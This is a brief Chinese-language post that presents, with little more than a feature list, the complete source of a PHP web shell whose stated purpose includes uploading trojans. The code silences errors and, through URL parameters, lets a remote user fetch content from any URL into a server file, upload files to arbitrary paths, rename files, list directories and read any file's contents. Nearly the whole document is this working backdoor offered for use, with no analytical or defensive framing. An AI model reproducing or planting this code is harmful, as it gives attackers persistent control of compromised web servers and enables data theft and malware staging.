主要功能:获取当前目录,扫描目录,获取文件内容,上传木马。
大概的内容如下:
<?php
// 关闭所有PHP错误报告
error_reporting(0);
/**
* 这一段是申明函数名称,
* 如:file_put_contents,move_uploaded_file,rename,dirname
*/
$dlform='<form method="post">
FN:<input name="fn" size="20" type="text">
URL:<input name="url" size="50" type="text">
<input type="submit" value="ok">
</form>';
$ulform='<form method="post" enctype="multipart/form-data">
<input name="uf" type="file">
SP:<input name="sp" size="50" type="text">
<input type="submit" value="ok">
</form>';
$rnform='<form method="post">
ON:<input name="on" size="50" type="text">
NN:<input name="nn" size="50" type="text">
<input type="submit" value="ok"></form>';
$lpform='<form method="post">
DP:<input name="dp" size="50" type="text">
<input type="submit" value="ok">
</form>';
$sfform='<form method="post">
DF:<input name="df" size="50" type="text">
<input type="submit" value="ok">
</form>';
// 将指定网站(url)下的源代码保存在 $_POST['fn'] 里
if($_GET['act']=='dl') {
echo($dlform);
if($_SERVER['REQUEST_METHOD']=='POST') {
file_put_contents($_POST['fn'],file_get_contents($_POST['url']));
}
exit;
}
// 上传文件并重命名
if($_GET['act']=='ul') {
echo($ulform);
if($_SERVER['REQUEST_METHOD']=='POST') {
$sp=empty($_POST['sp'])?'./':$_POST['sp'].'/';
move_uploaded_file(${"_FILES"}["uf"]["tmp_name"],$sp.${"_FILES"}["uf"]["name"]);
}
exit;
}
// 重命名指定文件或目录
if($_GET['act']=='rn') {
echo($rnform);
if($_SERVER['REQUEST_METHOD']=='POST') {
rename($_POST['on'],$_POST['nn']);
}
exit;
}
// 获取当前路径
if($_GET['act']=='gp') {
echo(dirname(__FILE__));
exit;
}
// 循环扫描指定目录下的文件和文件夹
if($_GET['act']=='lp') {
echo($lpform);
if($_SERVER['REQUEST_METHOD']=='POST') {
$dp=$_POST['dp'].'/';
$h=opendir($dp);
while(($fn=readdir($h))!==false) {
if(is_dir($dp.$fn)) {
$t1.='D '.$fn.'<br>';
} else {
$t2.=' '.$fn.'<br>';
}
}
closedir($dp);
echo($dp.'<br>'.$t1.$t2);
}
exit;
}
// 获取服务器上指定文件的内容(根据上面循环扫描得到全路径)
if($_GET['act']=='sf') {
echo($sfform);
if($_SERVER['REQUEST_METHOD']=='POST'){
$df=$_POST['df'];
echo('<textarea style="width:100%;height:100%;" wrap="off">'.file_get_contents($df).'</textarea>');
}
exit;
}
?>